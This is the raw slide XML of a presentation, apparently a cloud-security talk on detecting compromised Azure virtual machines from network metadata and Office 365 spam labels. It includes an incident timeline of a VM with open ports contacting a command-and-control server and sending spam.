          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Network Interactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Geo IP check, Unusual HTTP headers, Downloads obfuscated Executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2542811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212850"/>
            <a:ext cx="11887200" cy="4825937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We may not have the rich event meta data to detect attacks, but…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…We do have network meta-data for all tenants in Azure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detecting compromised tenants with it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does a compromised VM look like at the network layer?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s find compromised VMs by matching against payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or … How one tenant using O365 can help detect a compromised Azure VM used by another tenant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learnings from one cloud service can protect another</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Learning from other Cloud services</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3574777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8568" r="7287"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1321086" y="2894104"/>
            <a:ext cx="3028871" cy="1607811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>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One Cloud Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Helps Another…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Content Placeholder 14"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>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0" y="1817688"/>
            <a:ext cx="6711950" cy="5033962"/>
          </a:xfr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65050">
            <a:off x="4376419" y="5255391"/>
            <a:ext cx="1760858" cy="528258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6791398" y="1817442"/>
            <a:ext cx="4536728" cy="5280643"/>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836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thousands of labels from Office 365 allow us to train a large-scale model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1836" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Features are all external port numbers, and TCP flag combinations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1836" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Substantial evidence can provide sufficient information for predicting accurately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1836" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatic flow of labels would allow to automatically adapt for new trends </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1836" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="291436" indent="-291436" defTabSz="932597">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: How similar are the mail leaving Azure and the mail reaching Office 365?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A: will need to calibrate</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1836" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25851106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Engagement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5572" y="2813863"/>
            <a:ext cx="4002423" cy="932603"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409110" y="1513518"/>
            <a:ext cx="6145960" cy="2600689"/>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spcBef>
                <a:spcPts val="1020"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2856" dirty="0"/>
              <a:t>The customer forgot to add the VM to the Network Lockdown Security Group. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="690349" lvl="1" indent="-233149" defTabSz="932597">
              <a:spcBef>
                <a:spcPts val="1020"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2456" dirty="0"/>
              <a:t>All VM ports were open.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="233149" indent="-233149" defTabSz="932597">
              <a:spcBef>
                <a:spcPts val="1020"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2856" dirty="0"/>
              <a:t>Once approached, the customer added the machine to the NSG and all alerts stopped.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="447754" y="4553670"/>
            <a:ext cx="11540966" cy="1751884"/>
            <a:chOff x="552450" y="3722490"/>
            <a:chExt cx="11315700" cy="1717689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="552450" y="4842272"/>
              <a:ext cx="113157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1081"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67352"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03623"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939894"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576165"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12436"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848707"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4978"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121249"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57520"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393791"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030062"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66333"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302604" y="4744045"/>
              <a:ext cx="0" cy="209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938875" y="4744045"/>
              <a:ext cx="0" cy="20955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54215" y="5065333"/>
              <a:ext cx="809837" cy="374846"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="932597">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Apr16</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="TextBox 40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1440262"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17</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="TextBox 41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2077799"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18</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="TextBox 42"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2715336"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19</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="TextBox 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3352873"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20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="TextBox 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3990410"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21</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="TextBox 45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4627947"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22</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5265484"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23</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="TextBox 47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5903021"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24</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="TextBox 48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6540558"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25</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="TextBox 49"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7178095"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26</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="TextBox 50"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7815632"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27</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="TextBox 52"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8453169"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28</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="TextBox 53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9090706"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29</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="TextBox 54"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9728243" y="5061761"/>
              <a:ext cx="437940" cy="374846"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="932597">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>30</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="TextBox 55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10365787" y="5061761"/>
              <a:ext cx="756938" cy="374846"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="932597">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>May1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58" name="Straight Connector 57"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10575139" y="4744045"/>
              <a:ext cx="0" cy="20955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923925" y="4448175"/>
              <a:ext cx="9796542" cy="295870"/>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1836" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Outbound communication to C&amp;C (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1836" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>gumblar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1962150" y="4085333"/>
              <a:ext cx="685799" cy="295870"/>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918" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ti</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="918" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>: open Resolver</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Rectangle 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5778349" y="3722490"/>
              <a:ext cx="685799" cy="295870"/>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1428" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Spam</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Rectangle 58"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8884858" y="3722490"/>
              <a:ext cx="685799" cy="295870"/>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1428" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Spam</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7214992" y="326141"/>
            <a:ext cx="4365715" cy="1880774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27232926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Wrap Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205692351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Tenants bring their adversaries with them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adversaries follow their targets from on-prem to the cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Customers may not be used to threats that they see in the cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Innovate in defense by harnessing economic trends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hyperscale cloud investments dropping costs in compute, storage, networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store richer data, from more layers, for longer and process it with richer algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can use the cloud to protect itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attack on one tenant protects all tenants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud services can protect each other</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>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2802797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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15060047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428704">
            <a:off x="-94632" y="3854006"/>
            <a:ext cx="6637750" cy="2533662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="none" lIns="111010" tIns="55505" rIns="111010" bIns="55505" numCol="1">
            <a:prstTxWarp prst="textArchUp">
              <a:avLst>
                <a:gd name="adj" fmla="val 12000285"/>
              </a:avLst>
            </a:prstTxWarp>
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="soft" dir="t">
                <a:rot lat="0" lon="0" rev="10800000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d>
              <a:bevelT w="27940" h="12700"/>
              <a:contourClr>
                <a:srgbClr val="DDDDDD"/>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932563"/>
            <a:r>
              <a:rPr lang="en-US" sz="3599" b="1" kern="0" spc="150" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="25400" algn="tl" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Hyperscale clouds fueling defense innovation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arc 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3881910" y="2506803"/>
            <a:ext cx="9947769" cy="7692887"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14786619"/>
              <a:gd name="adj2" fmla="val 658867"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="111010" tIns="55505" rIns="111010" bIns="55505" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932563"/>
            <a:endParaRPr lang="en-US" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7791" y="4727995"/>
            <a:ext cx="5006828" cy="2266530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="111010" tIns="55505" rIns="111010" bIns="55505" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="346891" lvl="1" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Demand for SaaS driving hyperscale cloud growth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346891" lvl="1" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brings economic dividend driving down prices in compute, storage, and networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346891" lvl="1" indent="-346891" defTabSz="932563">
